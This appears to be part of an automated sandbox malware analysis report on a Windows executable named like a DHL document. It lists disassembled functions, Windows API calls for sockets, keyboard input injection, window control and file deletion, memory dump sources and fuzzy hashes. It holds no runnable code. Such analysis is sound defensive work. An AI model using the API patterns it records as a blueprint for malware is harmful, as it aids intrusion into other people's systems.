                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$FileModuleName
                                                                                      • String ID: C:\Users\user\Desktop\rDHL8350232025-2.exe
                                                                                      • API String ID: 2506810119-4067824147
                                                                                      • Opcode ID: 42d5f333dc30ca2aa84072996ce9ff7b011d4dbf9467c139a040e01308ed1ac2
                                                                                      • Instruction ID: d759e7e0547068a1131b687cf17ee0cdf1a88bf9dede768b0f7a192b5721148e
                                                                                      • Opcode Fuzzy Hash: 42d5f333dc30ca2aa84072996ce9ff7b011d4dbf9467c139a040e01308ed1ac2
                                                                                      • Instruction Fuzzy Hash: D8316275A04218BFDB21DF99D885DDEBBFEEB85310F184166F805D7212DAB04E40CB90
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0009C306
                                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 0009C34C
                                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00101990,00EF5DC0), ref: 0009C395
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Delete$InfoItem
                                                                                      • String ID: 0
                                                                                      • API String ID: 135850232-4108050209
                                                                                      • Opcode ID: f30fb79b36475234f4daf2414d7bd518b4f206366ec1bda18e595c1f29a54caf
                                                                                      • Instruction ID: e20c252a32469c43d68941a988db35a89456ce01c041f6417ae8c451ee044e54
                                                                                      • Opcode Fuzzy Hash: f30fb79b36475234f4daf2414d7bd518b4f206366ec1bda18e595c1f29a54caf
                                                                                      • Instruction Fuzzy Hash: 4B41C3716043019FEB20DF24D844F5ABBE8AF85320F00C61DF8A5972D2D770EA04DB52
                                                                                      APIs
                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,000CCC08,00000000,?,?,?,?), ref: 000C44AA
                                                                                      • GetWindowLongW.USER32 ref: 000C44C7
                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 000C44D7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Long
                                                                                      • String ID: SysTreeView32
                                                                                      • API String ID: 847901565-1698111956
                                                                                      • Opcode ID: b7ef0626a413ac0278af8031235753f475e4849834d76ab871ce8a6f37d96dc8
                                                                                      • Instruction ID: 336237b4f661781fafe78a2d68ddaf31ae817c733c7363b18ac0f1336989168b
                                                                                      • Opcode Fuzzy Hash: b7ef0626a413ac0278af8031235753f475e4849834d76ab871ce8a6f37d96dc8
                                                                                      • Instruction Fuzzy Hash: 27318931210605AFEB658F38DC45FEA7BA9FB08324F204329F979921E1D774AC509B50
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 000C461F
                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 000C4634
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID: '$p]
                                                                                      • API String ID: 3850602802-3217900071
                                                                                      • Opcode ID: 3904fc2bef018e9d625f99ce4bb5e02bfe502ca91d69fcbab060cd7660199096
                                                                                      • Instruction ID: fcd3c15875c043c34de3c0f0383feaec0971e2052c851aba169da72c3d1f6a4f
                                                                                      • Opcode Fuzzy Hash: 3904fc2bef018e9d625f99ce4bb5e02bfe502ca91d69fcbab060cd7660199096
                                                                                      • Instruction Fuzzy Hash: 59311774A006099FDB14CFA9C990FDE7BB5FB09300F10406AE904AB342D771A941CF90
                                                                                      APIs
                                                                                      • SysReAllocString.OLEAUT32(?,?), ref: 00096EED
                                                                                      • VariantCopyInd.OLEAUT32(?,?), ref: 00096F08
                                                                                      • VariantClear.OLEAUT32(?), ref: 00096F12
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: Variant$AllocClearCopyString
• String ID: *j
• API String ID: 2173805711-743776685
• Opcode ID: 5e25fe899bc25197b962d042141806cd4168299028e44f8eb10c29abbdebbfed
• Instruction ID: 8cfcc243ad2ddfd282dbd93ff14ef09722ecb6e1f23c561fe849f7a2e53a0696
• Opcode Fuzzy Hash: 5e25fe899bc25197b962d042141806cd4168299028e44f8eb10c29abbdebbfed
• Instruction Fuzzy Hash: 8A319172604245DFDF19AFA4E8A19FD37B5FF85304F1004A9F9038B2A2C7359916EB90
APIs
  • Part of subcall function 000B335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,000B3077,?,?), ref: 000B3378
• inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 000B307A
• _wcslen.LIBCMT ref: 000B309B
• htons.WSOCK32(00000000,?,?,00000000), ref: 000B3106
Strings
Similarity
• API ID: ByteCharMultiWide_wcslenhtonsinet_addr
• String ID: 255.255.255.255
• API String ID: 946324512-2422070025
• Opcode ID: 61bfd0a999dd0a42bb62ec8791d693d400f9e881bc6bc7c423663d20e74c3975
• Instruction ID: 127fe75fb20fe246c2b350602370887e5abc88330a9979ee3dae01aa58c5bd6d
• Opcode Fuzzy Hash: 61bfd0a999dd0a42bb62ec8791d693d400f9e881bc6bc7c423663d20e74c3975
• Instruction Fuzzy Hash: 8531F1396002019FDB20DF28C895EEA77E4EF14318F348559E9169B392DB72EE45CB60
APIs
Strings
Similarity
• API ID: _wcslen
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 176396367-2734436370
• Opcode ID: 9c83ecbee9da92638e0ec4255a53bcb763ccc60f6aeab8fa22f01f294789558a
• Instruction ID: 23c89aa448047508f0bd41acb430e7c70bff1c73c61a1c03b371959c9136cddf
• Opcode Fuzzy Hash: 9c83ecbee9da92638e0ec4255a53bcb763ccc60f6aeab8fa22f01f294789558a
• Instruction Fuzzy Hash: 3221087210461166DB31AB2C9C06FFB73EC9F51310F15842EFD499B182EB91AD45E3D6
APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 000C3840
• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 000C3850
• MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 000C3876
Strings
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733
• Opcode ID: edeb58deb277bfd2ddd34762b0c4761348a37375a9b6705e23d049b26426e04c
• Instruction ID: d395cbe6f663a5f49a55d97b5dcb969ba84037de15fb957e6e1ce797427058ee
• Opcode Fuzzy Hash: edeb58deb277bfd2ddd34762b0c4761348a37375a9b6705e23d049b26426e04c
• Instruction Fuzzy Hash: 1A218072614218BBEB219F54DC85FBF37AEEF89750F11C118F9049B190CA75DC5187A0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 000A4A08
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 000A4A5C
• SetErrorMode.KERNEL32(00000000,?,?,000CCC08), ref: 000A4AD0
Strings
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: %lu
• API String ID: 2507767853-685833217
• Opcode ID: 475c3dc51b631d7bdff0734be260a8da3bcf59f6acbeae26af14312950e290c6
• Instruction ID: 57507fe0cacb4307998c63ad4f6938863bfe114f42313bf142506e0b2eab8307
• Opcode Fuzzy Hash: 475c3dc51b631d7bdff0734be260a8da3bcf59f6acbeae26af14312950e290c6
• Instruction Fuzzy Hash: 7E317175A00109AFDB10DF94C885EAEBBF8EF49308F1480A9F909DB252DB75ED45CB61
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 000C424F
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 000C4264
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 000C4271
Strings
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
• Opcode ID: 7f236933805ca5c63818d579f17229aac67eb5546e16ac10772908994ac3816f
• Instruction ID: d8d699cca7211d41a32070363a306f84b08afe3b72ba0e8eae73ad57ad30cbb4
• Opcode Fuzzy Hash: 7f236933805ca5c63818d579f17229aac67eb5546e16ac10772908994ac3816f
• Instruction Fuzzy Hash: 0911E331240208BEEF215F68CC06FAB3BACFF85B54F014118FA55E6090D271D8519B10
APIs
  • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
  • Part of subcall function 00092DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00092DC5
  • Part of subcall function 00092DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00092DD6
  • Part of subcall function 00092DA7: GetCurrentThreadId.KERNEL32 ref: 00092DDD
  • Part of subcall function 00092DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00092DE4
• GetFocus.USER32 ref: 00092F78
  • Part of subcall function 00092DEE: GetParent.USER32(00000000), ref: 00092DF9
• GetClassNameW.USER32(?,?,00000100), ref: 00092FC3
• EnumChildWindows.USER32(?,0009303B), ref: 00092FEB
Strings
Similarity
• API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
• String ID: %s%d
• API String ID: 1272988791-1110647743
• Opcode ID: 29d7ccab83c22bb2361c8790605768ee7dc15a68e1e6abb28fe670a9ec5572b5
• Instruction ID: 523073459d68a937e0de85b4852e807761efe5cce3e414993ebaf56ad49c1516
• Opcode Fuzzy Hash: 29d7ccab83c22bb2361c8790605768ee7dc15a68e1e6abb28fe670a9ec5572b5
• Instruction Fuzzy Hash: 8F11B171600205ABDF557F70CC99EEE77AAAF84304F048075FA099B293DF319949AF60
APIs
• GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 000C58C1
• SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 000C58EE
• DrawMenuBar.USER32(?), ref: 000C58FD
Strings
Similarity
• API ID: Menu$InfoItem$Draw
• String ID: 0
• API String ID: 3227129158-4108050209
• Opcode ID: 35fad1976e1212aca511183226962838cc372836979818ffed6f7c17e7680a02
• Instruction ID: be69ffd3be8a444052006dab63c08155f640a38589d7239bf7af95f98792f77c
• Opcode Fuzzy Hash: 35fad1976e1212aca511183226962838cc372836979818ffed6f7c17e7680a02
• Instruction Fuzzy Hash: C4016D75500218EFEB619F11DC44FAFBBB8FB45362F1080A9E849D6151DB349AC4DF21
APIs
• GetForegroundWindow.USER32(?,001018B0,000CA364,000000FC,?,00000000,00000000,?,?,?,000876CF,?,?,?,?,?), ref: 000C7805
• GetFocus.USER32 ref: 000C780D
  • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
  • Part of subcall function 00049944: GetWindowLongW.USER32(?,000000EB), ref: 00049952
• SendMessageW.USER32(00EFE340,000000B0,000001BC,000001C0), ref: 000C787A
Strings
Similarity
• API ID: Window$Long$FocusForegroundMessageSend
• String ID: p]
• API String ID: 3601265619-1923361398
• Opcode ID: 0fad48d8d49b34b24b780c50680be0cfab661d6dd8b508db3fe4bb872dc7beab
• Instruction ID: cc070df4660c0822a1760de2645c1cd74262520300cd4f74fa1c4985223c8411
• Opcode Fuzzy Hash: 0fad48d8d49b34b24b780c50680be0cfab661d6dd8b508db3fe4bb872dc7beab
• Instruction Fuzzy Hash: 12018F316051009FE329DB28D858FBA33E6EF8A324F18026DE159872E1CB356C46CF81
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fbfa8731ded7a8ca3392ab0e415ac7d10abb87236b7e171d5c46a51868ab7f4c
• Instruction ID: 0d85e05ee286b1fa357207e2934b065315db61cefeb2533adf6f420106fd87f2
• Opcode Fuzzy Hash: fbfa8731ded7a8ca3392ab0e415ac7d10abb87236b7e171d5c46a51868ab7f4c
• Instruction Fuzzy Hash: 38C12C75A00216EFDB14CFA4C894EAEB7B9FF48704F208598E905EB251D731EE41EB90
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInitInitializeUninitialize
                                                                                      • String ID:
                                                                                      • API String ID: 1998397398-0
                                                                                      • Opcode ID: 477ba11900ac907c3489e579c58fb96267dcc74944d8000995ea2551ee86c1d3
                                                                                      • Instruction ID: 2a8f2c2791c7c124f814e4117f6a09aa34eb26c5ffeb50fd4a44948f24a7165f
                                                                                      • Opcode Fuzzy Hash: 477ba11900ac907c3489e579c58fb96267dcc74944d8000995ea2551ee86c1d3
                                                                                      • Instruction Fuzzy Hash: 12A16B756047009FCB15DF28C485EAAB7E9FF88714F148859F98A9B362DB70EE01CB91
                                                                                      APIs
                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,000CFC08,?), ref: 000905F0
                                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,000CFC08,?), ref: 00090608
                                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,000CCC40,000000FF,?,00000000,00000800,00000000,?,000CFC08,?), ref: 0009062D
                                                                                      • _memcmp.LIBVCRUNTIME ref: 0009064E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FromProg$FreeTask_memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 314563124-0
                                                                                      • Opcode ID: f7ba5d67824fc699400f58f5ad11c23c5c19d667c737bd098620ed78c0a1d287
                                                                                      • Instruction ID: 2d31c36415d8ce80d66d2b699a607ebf44a1fee05075cac0e18ac6178039e8d6
                                                                                      • Opcode Fuzzy Hash: f7ba5d67824fc699400f58f5ad11c23c5c19d667c737bd098620ed78c0a1d287
                                                                                      • Instruction Fuzzy Hash: 6281F671A00109EFCF04DF94C988EEEB7B9FF89315F204598E516AB250DB71AE06DB60
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free
                                                                                      • String ID:
                                                                                      • API String ID: 269201875-0
                                                                                      • Opcode ID: 383bb29c883ced643d7462ac278eb4f73ef0357fbffa8fc016c27940bf02bf8c
                                                                                      • Instruction ID: ccc4f12569830c1e2373e1118de8637cdcf02bd5cf356ba5651a44c485707e82
                                                                                      • Opcode Fuzzy Hash: 383bb29c883ced643d7462ac278eb4f73ef0357fbffa8fc016c27940bf02bf8c
                                                                                      • Instruction Fuzzy Hash: CA414871E00501ABDB356BBC8C46AFE3AE5EF41370F248225F81DD32D3EA3C89415266
                                                                                      APIs
                                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 000B1AFD
                                                                                      • WSAGetLastError.WSOCK32 ref: 000B1B0B
                                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 000B1B8A
                                                                                      • WSAGetLastError.WSOCK32 ref: 000B1B94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$socket
                                                                                      • String ID:
                                                                                      • API String ID: 1881357543-0
                                                                                      • Opcode ID: 240546d734cd3f75508afdc71f2e04d158f5b180d7e9cc6296c17d9946074e7f
                                                                                      • Instruction ID: 9ca24553d255b019ba9f5cb59a98beb737b2e6ae54404a02a665defd4d0b7956
                                                                                      • Opcode Fuzzy Hash: 240546d734cd3f75508afdc71f2e04d158f5b180d7e9cc6296c17d9946074e7f
                                                                                      • Instruction Fuzzy Hash: 4341B1746002006FE720AF24C886FAA77E5EB44718F948458FA1A9F3D3D772DD418B90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7bea6a918cfcca3bfed806a33a993de92fe72bf0bafb5040aa2562c926fb6cd6
                                                                                      • Instruction ID: f84582c5a524341afeb7efa5a6551d9c75ebc2360e0ecbf56e022dd05fe19161
                                                                                      • Opcode Fuzzy Hash: 7bea6a918cfcca3bfed806a33a993de92fe72bf0bafb5040aa2562c926fb6cd6
                                                                                      • Instruction Fuzzy Hash: 074119B1A00714BFD724AF38CC41BEABBEAEF84710F10852AF556DB2D2D77599418790
                                                                                      APIs
                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 000A5783
                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 000A57A9
                                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 000A57CE
                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 000A57FA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                      • String ID:
                                                                                      • API String ID: 3321077145-0
                                                                                      • Opcode ID: 11ff9685375bbcc58648b2a2a1d8bc87bbfbfaa8a464170bfb97f625748ce81f
                                                                                      • Instruction ID: 4f0ac46ae9fbf4ffc90e43080fd5970aabd977cc971a3731da5a5fe88a8ae643
                                                                                      • Opcode Fuzzy Hash: 11ff9685375bbcc58648b2a2a1d8bc87bbfbfaa8a464170bfb97f625748ce81f
                                                                                      • Instruction Fuzzy Hash: 07413E39600A10DFDB25DF55C444A5DBBE5FF49321F188488E84AAB362CB74FD01CB91
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00056D71,00000000,00000000,000582D9,?,000582D9,?,00000001,00056D71,8BE85006,00000001,000582D9,000582D9), ref: 0006D910
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0006D999
                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0006D9AB
                                                                                      • __freea.LIBCMT ref: 0006D9B4
                                                                                        • Part of subcall function 00063820: RtlAllocateHeap.NTDLL(00000000,?,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6,?,00031129), ref: 00063852
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                      • String ID:
                                                                                      • API String ID: 2652629310-0
                                                                                      • Opcode ID: 20b6e46a375e418717ab47178804057c03b636f841cfb45c7a75ceedcb7fc7a2
                                                                                      • Instruction ID: 9bff75bbb65425934817ff584f8020d5da37f28b04ecf4eb17eb4ac2e3a08b6f
                                                                                      • Opcode Fuzzy Hash: 20b6e46a375e418717ab47178804057c03b636f841cfb45c7a75ceedcb7fc7a2
                                                                                      • Instruction Fuzzy Hash: 0031AD72A0020AABEF259F65DC45EEF7BA6EB41310B05416AFC08D7291EB35CD54CBA0
                                                                                      APIs
                                                                                      • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0009ABF1
                                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 0009AC0D
                                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 0009AC74
                                                                                      • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0009ACC6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                      • String ID:
                                                                                      • API String ID: 432972143-0
                                                                                      • Opcode ID: 2f193df8491f5a4c238148f864e434510fce631da61cfc06de156d7250baf388
                                                                                      • Instruction ID: 2c3ec746e1f28ab5756165947c12a4314cf1ba7882c4f6a084e9368e193ec3d2
                                                                                      • Opcode Fuzzy Hash: 2f193df8491f5a4c238148f864e434510fce631da61cfc06de156d7250baf388
                                                                                      • Instruction Fuzzy Hash: 6A3106B0B046186FFF35CB65CC04BFE7BE5AB8A321F04461AE4859A1D1C3798985A7D2
                                                                                      APIs
                                                                                      • GetForegroundWindow.USER32 ref: 000C16EB
                                                                                        • Part of subcall function 00093A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00093A57
                                                                                        • Part of subcall function 00093A3D: GetCurrentThreadId.KERNEL32 ref: 00093A5E
                                                                                        • Part of subcall function 00093A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000925B3), ref: 00093A65
